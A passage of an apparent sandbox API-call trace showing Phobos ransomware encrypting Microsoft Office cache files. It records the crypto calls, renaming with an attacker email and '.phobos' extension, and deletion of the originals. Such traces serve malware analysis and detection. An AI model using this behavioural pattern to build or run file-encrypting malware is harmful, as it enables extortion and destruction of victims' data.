hFile=0x14c, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0147.102] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0147.104] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0147.104] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0147.105] CloseHandle (hObject=0x14c) returned 1 [0148.205] SetEvent (hEvent=0xe8) returned 1 [0148.205] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0148.205] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0148.206] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=11482605) returned 1 [0148.206] CloseHandle (hObject=0x14c) returned 1 [0148.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab")) returned 0x2020 [0148.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0148.482] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0148.482] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0148.482] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0148.482] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0148.504] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0148.504] ReadFile (in: hFile=0x14c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0148.997] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0148.997] ReadFile (in: hFile=0x14c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0149.034] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32d68) returned 1 [0149.034] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0149.034] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050) returned 1 [0149.042] CryptDestroyKey (hKey=0xa32d68) returned 1 [0149.042] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0149.043] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0102, lpOverlapped=0x0) returned 1 [0149.058] SetEndOfFile (hFile=0x14c) returned 1 [0149.059] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0149.059] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0149.060] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0149.060] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0149.062] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0149.062] WriteFile (in: hFile=0x14c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0149.063] CloseHandle (hObject=0x14c) returned 1 [0149.063] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0149.063] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0149.068] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=881152) returned 1 [0149.068] CloseHandle (hObject=0x138) returned 1 [0149.068] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 0x2020 [0149.068] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.068] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0149.068] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0149.068] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0149.068] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0149.069] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d68) returned 1 [0149.069] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0149.069] ReadFile (in: hFile=0x138, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xd7200, lpOverlapped=0x0) returned 1 [0149.709] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd7210, dwBufLen=0xd7210 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd7210) returned 1 [0149.716] WriteFile (in: hFile=0x18c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xd7210, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xd7210, lpOverlapped=0x0) returned 1 [0149.743] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0149.743] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0149.743] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0149.743] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.743] WriteFile (in: hFile=0x18c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0149.743] CryptDestroyKey (hKey=0xa32d68) returned 1 [0149.743] CloseHandle (hObject=0x138) returned 1 [0149.743] CloseHandle (hObject=0x18c) returned 1 [0149.743] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 1 [0149.750] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0149.750] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.954] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=885760) returned 1 [0149.954] CloseHandle (hObject=0x148) returned 1 [0149.954] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 0x2020 [0149.954] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.954] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.954] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0149.954] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0149.954] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.954] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0149.954] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0149.955] ReadFile (in: hFile=0x148, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xd8400, lpOverlapped=0x0) returned 1 [0150.026] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd8410, dwBufLen=0xd8410 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd8410) returned 1 [0150.036] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xd8410, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xd8410, lpOverlapped=0x0) returned 1 [0150.149] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0150.149] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0150.149] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0150.149] CryptDestroyKey (hKey=0xa32c28) returned 1 [0150.149] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0150.150] CryptDestroyKey (hKey=0xa32da8) returned 1 [0150.150] CloseHandle (hObject=0x148) returned 1 [0150.150] CloseHandle (hObject=0x190) returned 1 [0150.150] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 1 [0150.157] SetEvent (hEvent=0xe8) returned 1 [0150.157] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0150.157] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0150.157] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=868864) returned 1 [0150.157] CloseHandle (hObject=0x190) returned 1 [0150.157] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 0x2020 [0150.157] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0150.157] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0150.157] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0150.157] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0150.157] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0150.158] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0150.158] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0150.158] ReadFile (in: hFile=0x190, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xd4200, lpOverlapped=0x0) returned 1 [0150.236] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd4210, dwBufLen=0xd4210 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd4210) returned 1 [0150.243] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xd4210, lpOverlapped=0x0) returned 1 [0150.264] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0150.265] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0150.265] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0150.265] CryptDestroyKey (hKey=0xa32d68) returned 1 [0150.265] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0150.265] CryptDestroyKey (hKey=0xa32da8) returned 1 [0150.265] CloseHandle (hObject=0x190) returned 1 [0150.265] CloseHandle (hObject=0x148) returned 1 [0150.265] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 1 [0150.299] SetEvent (hEvent=0xe8) returned 1 [0150.300] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0150.300] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0150.300] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=873984) returned 1 [0150.300] CloseHandle (hObject=0x148) returned 1 [0150.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 0x2020 [0150.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0150.300] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0150.301] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0150.301] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0150.301] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0150.301] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0150.301] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0150.301] ReadFile (in: hFile=0x148, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xd5600, lpOverlapped=0x0) returned 1 [0150.413] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd5610, dwBufLen=0xd5610 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd5610) returned 1 [0150.420] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xd5610, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xd5610, lpOverlapped=0x0) returned 1 [0150.440] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0150.440] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0150.440] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 